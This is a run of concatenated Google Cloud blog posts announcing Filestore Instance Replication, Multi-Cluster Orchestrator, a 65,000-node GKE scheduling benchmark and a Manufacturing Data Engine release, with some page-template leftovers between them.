Together, these projects allow customers to qualify and benchmark accelerators with the inference performance project, operationalize scale-out architectures with LLM-aware routing with the Gateway API Inference extension, and provide an environment with scheduling and fungibility benefits across a wide range of accelerators with DRA and vLLM. To try out these new capabilities for running gen AI inference on Kubernetes, visit Gateway API Inference Extension, the inference performance project or Dynamic Resource Allocation. Also, be sure to visit us at KubeCon in London this week, where we’ll be participating in the keynote as well as many other sessions. Stop by Booth S100 to say hi!
We are excited to announce Filestore Instance Replication on Google Cloud, which helps customers meet their business continuity goals and regulatory requirements. The feature offers an efficient replication point objective (RPO) that can reach 30 minutes for data change rates of 100 MB/sec.
Our customers have been telling us they need to meet regulatory and business requirements for business continuity, and have been looking for file storage that provides that capability. Instance Replication lets customers replicate Filestore instances to a secondary location – a remote region, or a separate zone within a region. The feature continuously replicates increments and changes in data taking place on the active instance to the standby instance in the secondary location.
The process of replicating an instance is simple:
A new designated standby instance is created in the remote location
The feature performs an initial sync moving all data from the active source instance to the standby replica instance
Upon completion, incremental data is continuously replicated
An RPO metric lets customers monitor the replication process
In the event of an outage in the source region, customers can break the replication
Customers can simply connect their application to the replica instance and continue their business – with minimal data loss.
It can take as little as 2 minutes to set up, monitoring is simple, and breaking the replication is achieved using a single command.
The feature is available on Filestore Regional, Zonal, Enterprise and High Scale tiers. Instance Replication functionality is provided at no charge and customers are billed for the components used in the service, which are the Filestore instances and cross-regional networking. Give it a try here.
Today, we’re excited to announce the public preview of Multi-Cluster Orchestrator, a new service designed to streamline and simplify the management of workloads across Kubernetes clusters. Multi-Cluster Orchestrator lets platform and application teams optimize resource utilization, enhance application resilience, and accelerate innovation in complex, multi-cluster environments.
As organizations increasingly adopt Kubernetes to deploy and manage their applications, the need for efficient multi-cluster management becomes critical. Challenges such as resource scarcity, ensuring high availability, and managing deployments across diverse environments create significant operational overhead. Multi-Cluster Orchestrator addresses these challenges by providing a centralized orchestration layer that abstracts away the complexities of underlying Kubernetes infrastructure matching workloads with capacity across regions.
Key benefits of Multi-Cluster Orchestrator
Simplified multi-cluster workload management: Multi-Cluster Orchestrator lets you manage workloads across multiple Kubernetes clusters as a single unit. Platform teams can focus on defining guardrails and policies, while application teams can concentrate on their core workloads.
Intelligent resource optimization: Multi-Cluster Orchestrator tackles the challenge of resource scarcity by intelligently placing workloads in clusters with available capacity, such as those with GPUs. This helps ensure optimal resource utilization and helps organizations avoid stockouts without incurring unnecessary costs.
Enhanced application resilience: Multi-Cluster Orchestrator facilitates regional failure tolerance for critical applications by enabling deployments across multiple clusters.
Tight integration with existing tools: Multi-Cluster Orchestrator is designed to complement existing workflows and tools. For example, the Argo CD plugin lets you integrate Multi-Cluster Orchestrator with their GitOps practices, leveraging their existing continuous delivery pipelines.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ecbc6b74850>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Who should use Multi-Cluster Orchestrator?
Multi-Cluster Orchestrator is designed for:
Platform engineering teams with a GitOps focus: GitOps-focused teams building and managing general serving applications across multiple GKE regions using tools like Argo CD can leverage Multi-Cluster Orchestrator to simplify multi-cluster deployments. In addition, teams with custom continuous delivery (CD) solutions can use it to provide cluster target recommendations, enhancing their existing deployment workflows.
AI/ML inferencing platform teams: Teams looking for dynamic resource allocation to minimize stockout risks and optimize costs for their AI/ML inferencing applications can benefit from Multi-Cluster Orchestrator’s intelligent workload placement.
Early adopters of Multi-Cluster Orchestrator are already seeing value from the tool. Abridge, for one, a company dedicated to delivering sophisticated AI solutions for clinical conversations in healthcare, recognizes its promise
“Multi-Cluster Orchestrator offers an opportunity to further scale our inference workloads across multiple GKE clusters. Its ability to intelligently manage resource allocation could lead to improved availability and cost efficiency. We’re evaluating how automating workload placement and scaling with this technology can streamline our operational framework and advance our AI-driven processes.” – Trey Caliva, Staff Platform Engineer, Abridge
Get started with Multi-Cluster Orchestrator
At Google Cloud, we’re committed to helping organizations build and manage their applications at scale. Multi-Cluster Orchestrator represents a significant step towards simplifying multi-cluster Kubernetes management and enabling the next generation of cloud-native applications.
Multi-Cluster Orchestrator is now available in public preview. To learn more and get started, visit the documentation.
At Google Cloud, we’re continuously working on Google Kubernetes Engine (GKE) scalability so it can run increasingly demanding workloads. Recently, we announced that GKE can support a massive 65,000-node cluster, up from 15,000 nodes. This signals a new era of possibilities, especially for AI workloads and their ever-increasing demand for large-scale infrastructure.
This groundbreaking achievement was built upon Google’s prior experience training large language models (LLMs) on a 50,000+ chip TPU cluster. By leveraging technologies like TPU multislice training, GKE can now handle a massive number of virtual machines while addressing challenges in resource management, scheduling, and inter-node communication.
In addition to demonstrating GKE’s capability to handle extreme scale, this breakthrough also offers valuable insights for optimizing large-scale AI training on Google Cloud.
Running large AI workloads on Kubernetes means running both resource-intensive training and dynamic inference tasks. You need a huge amount of computational resources to train a massive, interconnected model. Simultaneously, inference workloads need to scale efficiently in response to changing customer demand. Mixing training and inference — two workloads with different characteristics — on the same cluster presents a number of complexities that need to be addressed.
In this blog post, we explore a benchmark that simulates these massive AI workloads on a 65,000-node GKE cluster. As we look to develop and deploy even larger LLMs on GKE, we regularly run this benchmark against our infrastructure as a continuous integration (CI) test. We look at its results in detail, as well as the challenges we faced and ways to mitigate them.
Benchmark design
As with any benchmark, the devil is in the details. Below, here are some of the requirements we set forth for our test environment:
CPU-only: For the purpose of benchmarking the Kubernetes control plane, we opted to use CPU-only machines, which is a much more cost-effective way to measure the performance of the cluster on a large scale compared to GPUs or TPUs.
Cluster size: At the start of the benchmark we created a 65,000-node cluster. We assumed the cluster would not need to autoscale on the node level, but that workloads dynamically change in size, and can be stopped and restarted.
Real-life scenarios: We wanted to show the GKE cluster’s ability to accommodate scaling, ease of use, and workload fungibility between training and inference based on real-life scenarios and use cases. As such, the benchmark focused on scenario-related metrics like scheduler throughput. Specifically, we prioritized a usage pattern that combines a very large training job (50K+ nodes) with a scalable inference workload.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebe97ca7fa0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Cluster setup
We created the 65,000-node cluster using a publicly available Terraform configuration, with variables to set the cluster name and project. To achieve this scale, we followed best practices from the GKE documentation on planning large GKE clusters.
kube-scheduler
We also used a customized kube-scheduler configuration for our simulated workload. At 500 bindings per second, we were able to schedule a large-scale workload, ensuring high efficiency of the resources.
Simulating the AI workload
In our experiment, we used a StatefulSet with Pods running sleep containers (minimal containers running a sleep command for the duration of the pod’s running) to simulate the behavior of a large-scale AI workload. This allowed us to closely examine resource allocation and scheduling within the Kubernetes cluster without having to run distributed AI workloads on CPU-based VMs. When designing the workload, we made the following design decisions:
Choosing the right Kubernetes workload: For our test setup we focused on the StatefulSet API, which is commonly used in generative AI workloads. We used a headless service for the StatefulSet to mimic communication between Pods within the distributed training workload.
Ensuring a single-user-workload Pod per node (in addition to DaemonSets): We configured the StatefulSet to ensure that only one Pod was scheduled per Node, which reflects how most users currently run their AI workloads. We did this by specifying the hostPort within the StatefulSet’s Pod spec template.
Simulating “all-or-nothing” preemption: To accurately reflect the dynamics of AI workloads, especially the “all-or-nothing” nature of many distributed training jobs, we implemented a manual scale-down mechanism. This means we trigger scale-down of the training workload right after the inference workload scales up.
By employing these techniques, we were able to create a realistic simulation of an AI workload within our Kubernetes cluster. This environment enabled us to thoroughly test the scalability, performance, and resilience of the cluster under a variety of conditions.
Tooling
To develop our benchmark, we used several tools, including ClusterLoader2 to build the performance test, Prow to run the test as part of our continuous integration pipeline, Prometheus to collect metrics, and Grafana to visualize them.
Performance test
Our simulated scenario mimics a mix of AI workloads: AI training and AI inference. There are five phases, with each simulating a different real-life scenario that occurs over the course of the LLM development and deployment lifecycle.
Phase #1: Single workload — creating a large training workload (StatefulSet) from scratch In the first phase, we run a large training workload, represented by a StatefulSet with 65,000 nodes. This represents a large-scale distributed training that spans 65,000 VMs. Each Pod maps to a single Node, utilizing all of the resources accessible within the cluster.
The phase is complete when the training job terminates, ending in an empty cluster.
Phase #2: Mixed workload — training and inference workloads (StatefulSets) In the second phase, we run a mixed workload environment within a single cluster, highlighting the capability of running different types of workloads and sharing resources. This involves concurrently running one training workload with 50,000 Pods and another inference workload with 15,000 Pods. Each Pod is assigned to a single Node, helping to ensure full utilization of the cluster’s resources. Notably, the inference workload is given higher priority than the training workload.
Phase #3: Scale up of inference workload (StatefulSet), training workload disruption In Phase #3, we scale up the inference workload, which in real life is typically due to increased traffic/demand on the services. Since the inference workload has a higher priority, it interrupts the training workload. Once the inference workload is scheduled and running, we recreate the training workload. Given that the training workload has a lower priority, it stays in pending state as long as the inference workload is working at full capacity.
Phase #4: Scale down inference workload, training workload recovery Here, we simulate a decrease in traffic on the inference workload, triggering the scale-down of the inference workload from 65,000 Pods back to 15,000 Pods. This enables the pending training workload to be scheduled and run again.
Phase #5: Training workload finishes Finally, we come to the end of the training, indicated by the termination and deletion of training workload, freeing up resources in the cluster.
Note: In our tests we used StatefulSets as this is what large AI model producers use. However with the latest advancements, Kubernetes Job and JobSet are the recommended APIs to run ML training workloads. Those abstractions were also tested at scale, but in dedicated tests.
Metrics
For our test we used ClusterLoader2’s built-in measurements to collect relevant metrics, metrics from Prow logs, and internal GKE metrics.
Key metrics measured by ClusterLoader2 include:
Pods state transition duration: How long it takes a workload’s Pod to change state (e.g., to reach running state or to be deleted); monitoring a workload’s in-progress status (i.e., how many Pods are created, running, pending schedule, or terminated).
Pod startup latency: The time it takes for a Pod to go from being created to be marked as running.
Scheduling throughput: The rate at which Pods are successfully assigned to Nodes
In addition to the ClusterLoader2 measurements, we also measured:
Cluster creation/deletion time
Various cluster metrics that are exported to Prometheus (e.g., API server latency metrics)
Benchmark results
The results we present in this document are based on a simulation that runs at a specific point in time. To provide context, here’s a timeline with an explanation of when each phase took place.
Observing workloads
Based on data from ClusterLoader2, we generated the chart below, which summarizes all the phases and how the training and inference workload interact with one another throughout the performance test.
In phase #1, we see a smooth workload creation process in which pods are created pretty quickly, and scheduled with only minor delay. The process takes ~2.5m to create, schedule and run 65,000 Pods on an empty cluster (with caveats — see the previous section).
In phase #2, we observe a similar smooth creation process for the training workload, with 50,000 Pods created in under 2 min from an empty cluster. Moreover, we observe the creation of 15,000 Pods for the inference workload in under a minute from a nearly full cluster, demonstrating the fast scheduling even when the cluster is not empty.
In Phase #2, both training and inference workloads were scheduled quickly. Notably, 15,000 inference Pods were created in under a minute on a nearly full cluster, demonstrating fast scheduling even on a non-empty cluster.
During phase #3, we observe the scale up of the inference workload to 65,000 Pods and the disruption and termination of the training workload. Scheduling inference Pods suffers some delay compared to phase 2 due to waiting for the training Pods to be evicted from the Nodes. Nonetheless, the entire startup process for the inference workload takes less than four minutes in total.
After terminating and recreating the training workload, we observe its Pods in pending state (as seen between 7:20 and 7:25 in the graph, with the dotted blue representing created training pods, at 50,000 and the dotted orange representing the running training with Pods at 0) while the higher-priority inference workload occupies the full 65,000 Nodes.
Cluster performance
We use the metrics collected by Prometheus for information about control-plane performance across the experiment’s timeline. For example, you can see the P99 API call latency across various resources, where all API calls, including write calls, are under 400 ms latency — well within the 1s threshold; this satisfies the OSS SLO for resource-scoped API calls.
While API call latency provides a general indication of cluster health, particularly for the API server (as demonstrated by the consistently low response times shown previously), Pod creation and binding rates provide a more holistic perspective on overall cluster performance, validating the performance of the various components involved in the Pod startup process. Our benchmark reveals that a standard GKE cluster (without advanced scheduling features) can achieve a Pod creation rate of 500 Pods per second (see graph below).
Metrics results
Below you can see a table that summarizes the metrics collected through the different phases of the performance test. Please note that these metrics are a result of our experiments done at the time and shouldn’t be taken as SLOs or guarantees of performance in all scenarios. Changes in performances might be observed due to changes in GKE versions.
Final remarks
In this experiment, we showcase the GKE cluster’s ability to manage substantial and dynamic workloads. While you find specific metrics in the above table, here are a few general observations about running large AI workloads on GKE, and the potential implications for your own workloads.
Scaling efficiency: Our experiment involved rapid scaling of massive workloads, both up and down. However, even for such large workloads, scaling was quite efficient. Creating a StatefulSet of 65,000 Nodes and having all the Pods run on an empty cluster took only 2 min and 24 seconds! Scaling up and down during phase 3 and 4 were also both quite fast, with inference workload taking ~4min to scale up from 15,000 to 65,000 Pods (including waiting for training workload to preempt), and ~ 3min to scale down to 15,000 Pods again.
Image pulling and Pod startup latency: During Phase 1, we experienced a bit of degradation in Pod startup latency, with P100 around 20.4s compared to 5.6s and 5.0s in phase 2. This is due to image pull-time from Artifact Registry. It wasn’t relevant in later phases as Pods used the cached images already on the Nodes. Moreover, in this benchmark we used a small sleep container to run on the Pods of the StatefulSet — a workload that we knew wouldn’t cause additional delays that might impact performance. However, in a real-life scenario with larger images, prepare to see slower initial Pod startup times, since size of a typical image for an ML workflow will likely be in the order of gigabytes.
Workload diversity and its effect on scheduling throughput: The introduction of mixed workloads (training and inference) in Phase #2 and later scaling and preemption in Phase #3 adds a layer of complexity. This affected the median/average scheduling throughput, bringing it down to 222/208 Pod/s (from 496/417 Pod/s) respectively.
Performance bottlenecks: Examining detailed metrics can help identify potential bottlenecks. For instance, high Pod startup latency could indicate issues with resource provisioning or image pulling. We observed such issues and we were able to bring down initial StatefulSet creation time in phase 1 from 12 min to 2min 30 sec by tweaking the setup a bit. This included using Artifact Registry instead of Container Registry, as well as disabling the auto-mounting of service account credentials to StatefulSet by Kubelet (using automountServiceAccountToken: false).
Overall, the experiment’s focus on large-scale workloads makes our results particularly relevant for organizations deploying machine learning or data-processing applications on Kubernetes. The experiments, focused on Kubernetes Control Plane (KCP) performance, are part of our regular CI tests. We are continuously expanding these tests to validate the growing demands of running AI workloads on these massive clusters. Stay tuned for future blog posts exploring more sophisticated scenarios on a 65,000-node cluster, including the use of accelerators and the evaluation of diverse AI workloads on GKE.
In today’s dynamic business landscape, manufacturers are facing unprecedented pressure. The relentless pace of e-commerce combined with a constant threat of supply chain disruptions, creates a perfect storm. To overcome this complexity, leading manufacturers are leveraging the power of AI and integrated data solutions to not only survive, but thrive.
This week, at Hannover Messe, Google Cloud is announcing the latest release of its signature solution, Manufacturing Data Engine (MDE), to help manufacturers unlock the full potential of their operational data and drive AI transformation on-and-off the factory floor faster. We believe it will play a critical role in helping forward thinking leaders address five critical trends that are shaping the future of manufacturing.
1. B2B buyers demand digital-first experiences
Business buyers are increasingly adopting consumer-like behaviors, forgoing traditional, linear sales cycles. According to Gartner, 80% of B2B sales will be generated digitally in 2025. This shift demands a digital-first approach that extends beyond online storefronts to create seamless, personalized experiences across the entire customer journey.
For leading manufacturers, AI-powered user experiences can help address this shift in behavior. By leveraging AI to personalize product recommendations, streamline online ordering, and provide real-time customer support, manufacturers can meet the demands of digitally-savvy buyers.
2. Resilience is non-negotiable
The pandemic exposed the fragility of global supply chains and disruptions continue to be commonplace. According to Accenture, supply chain disruptions cause businesses to miss out on $1.6 trillion in revenue growth opportunities each year, on average. To increase resilience and address disruption isn’t just a logistical challenge it requires a proactive approach. Manufacturers need to enhance visibility, improve forecasting, and leverage technology to identify and mitigate potential risks.
Multimodal AI can help improve supply chain management. By analyzing data from various sources like sensor data, visual inspections, and logistics tracking, AI can provide a holistic view of the supply chain, enabling proactive responses to disruptions.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e97ccaaeb20>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
3. Bridging a digital skills gap
The manufacturing industry is facing a severe shortage of skilled workers, exacerbated by the rapid pace of technological advancements. Deloitte and The Manufacturing Institute found that there could be as many as 3.8 million net new employees needed in manufacturing between 2024 and 2033, and that around half of these jobs (1.9 million) could remain unfilled if the talent void is not solved. This talent gap poses a significant challenge to productivity, innovation, and long-term growth. Addressing the talent gap in manufacturing requires a multi-pronged approach. Manufacturers must invest in upskilling and reskilling their existing workforce, while also attracting and retaining top talent through competitive benefits and engaging work environments.
To empower existing workers and accelerate training, multimodal assistive search tools can provide instant access to relevant information through various formats like text, audio, and video. These tools enable users to verbally query for information, receive spoken answers or summaries of manuals, listen to step-by-step instructions, and even facilitate the creation of video-based training materials – rapidly enabling learning.
4. Sustainability is a business mandate (Enhanced by AI Agents)
Sustainability is now deeply intertwined with business success and 88% of manufacturers recognizing the critical role of technology in going green.. Consumers are increasingly demanding sustainable products and practices, and regulators are imposing stricter environmental standards. Manufacturers must embrace sustainable practices across their entire value chain, from sourcing raw materials to minimizing waste and reducing their carbon footprint.
To manage complex sustainability reporting, AI agents can automate data collection, and analysis.To help with compliance, agents can verify the materials and ingredients used against sources, track proper disclosures, and confirm adherence to mandated disclaimers.
5. Unlocking holistic insights
Many manufacturing organizations operate with siloed data residing in disparate departments and systems. The data is also incredibly diverse, often including Operational Technology (OT) data from the shop floor, Information Technology (IT) data from enterprise systems, and Engineering Technology (ET) data from design and simulation tools. This fragmentation, coupled with the differences in data formats, structures, and real-time requirements across these domains, can hinder manufacturers’ ability to gain a holistic view of their operations. This leads to missed opportunities for optimization and inefficient decision-making.Breaking down these silos and establishing interoperability across OT, IT, and ET data is critical for unlocking the full potential of AI and driving truly informed business decisions.
As manufacturers integrate more data, the risk increases and AI-powered security becomes essential. AI can detect anomalies, facilitate threat intelligence including prevention, detection, monitoring and remediation – and ensure data integrity across interconnected systems, safeguarding sensitive information.
How does MDE and Cortex Framework help manufacturers address these 5 challenges?
Manufacturing Data Engine provides a unified data and AI layer that facilitates the analysis of multimodal data for better supply chain visibility, supports assistive search for bridging talent gaps, and enables AI agents to optimize sustainability initiatives. Furthermore, MDE helps contextualize various types of data, including OT, IT, and ET, allowing for richer insights and more effective AI applications. Critically, MDE aids in establishing a digital thread by connecting data back to its source, ensuring traceability and a holistic understanding of the product lifecycle. Moreover, Cortex Framework allows for the seamless integration of enterprise data with manufacturing data, enabling use cases like forecasting financial impact with machine data and optimizing production schedules based on demand signals.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of the new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine.
Breaking down the data silos between IT (business data) and OT (industrial data) is critical for manufacturers seeking to harness the power of AI for competitive advantage. This week, at Hannover Messe, Google Cloud is excited to announce the latest release of its signature solution, Manufacturing Data Engine, to help manufacturers unlock the full potential of their operational data and drive AI transformation on-and-off the factory floor faster.
In 2024, we delivered a number of enhancements to MDE to strengthen the integration between OT and IT data, and with initial technical foundation extensions for MDE to integrate with Cortex Framework. At the same time, the adoption of Cortex Framework, which helps customers accelerate business insights into their enterprise IT data, has grown beyond the traditional enterprise IT data sources from ERP, CRM, and ESG, to marketing and social media, and more.
Building on our progress, this latest MDE release completes our IT/OT integration journey and introduces powerful new features: Development Mode, historical metadata linking, Configuration Packages, to enable better data grounding of IT and OT data to drive faster AI outcomes. These advancements empower manufacturers to unlock deeper insights and achieve more with their data.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3dff362f6c70>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Accelerating innovation with Development Mode: With Development Mode, manufacturers have more flexibility to delete configuration objects, which is particularly valuable in development and proof-of-concept (PoC) environments. This helps accelerate the innovation cycle by making it easier and less time-consuming to experiment with new data models.
Ingest time-shifted data with historical metadata linking: This feature uses event-time to map the correct metadata instances, which are extended with a “valid from” timestamp. This means manufacturers can load historical data at a later date and MDE will insert it into the right place in the timeline, ensuring accurate historical data representation of your data. This is helpful for manufacturers who need to load data out of order, and in turn makes it easier to analyze historical trends and patterns to optimize their operations.
Streamlining IT and OT with Configuration Packages: MDE Configuration Packages provide a powerful new way to merge factory floor data with your core enterprise systems by creating and packaging industry and use case-specific MDE configurations. Manufacturers can bridge the IT and OT gap, packaging their OT data from MDE in predictable schemas for integration within Cortex Framework alongside supply chain, marketing, finance, and sustainability data.
These powerful new features along with faster IT and OT data integration unlock a spectrum of transformative use-cases.
For example, manufacturers can visualize optimizing production schedules based on real-time demand signals from their marketing campaigns, or accurately forecast financial impacts by correlating machine performance with ERP financial data. They can enhance sustainability initiatives by analyzing energy consumption alongside production output.
Combine multimodal data from your factory with enterprise IT data for a holistic view of your operations
By contextualizing multimodal data from machines, sensors, and cameras with data from Cortex Framework, manufacturers gain a truly holistic view of their operations.
Unlocking new Gen AI use cases
Previously, manufacturers could combine OT data using MDE with Google AI services for things like faster issue resolution with ML-based anomaly detection, or flexible and scalable visual quality control.
With this release, we’re enabling even more possibilities for manufacturing intelligence by making it easier and faster to unify IT and OT data to use in grounding large language models (LLMs) for generative AI applications. Conversational Analytics lets you chat with your BigQuery data, Sheets, Looker Explores/Reports/Dashboards and more for generative analytics and insights. Imagine getting current open support cases from your customer support system, spotting an outlier, and being able to immediately ask for and trace the outlier part through to the production quality data from your factory floor to isolate the issue.
Use Conversational Analytics to get immediate, data-driven insights
By building on this latest release of MDE with Cortex Framework, in combination with Google Cloud’s AI capabilities, manufacturers can receive immediate, data-driven insights, empowering you to make smarter, faster decisions across your entire value chain.
Partner ecosystem: Driving customer success with Deloitte
We’re proud to work with a robust ecosystem of partners who are instrumental in helping our customers achieve their digital transformation goals in manufacturing.
We’re especially excited to announce that Deloitte has launched a packaged services offering for our latest MDE release, enabling customers to quickly leverage the new capabilities with services delivered by a trusted partner. Contact Deloitte to learn more, or visit their demo stand at the Google Cloud booth at Hannover Messe and at Google Cloud Next to understand how they can help you with your initiatives.
Looking ahead
Our latest release of MDE represents a significant milestone in our journey to empower manufacturers with the tools they need to thrive in the digital age. We’re committed to continuous innovation and look forward to partnering with you on your industrial transformation journey.
Stay tuned for more updates and insights from Google Cloud.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine, or join one of our Manufacturing-focused sessions.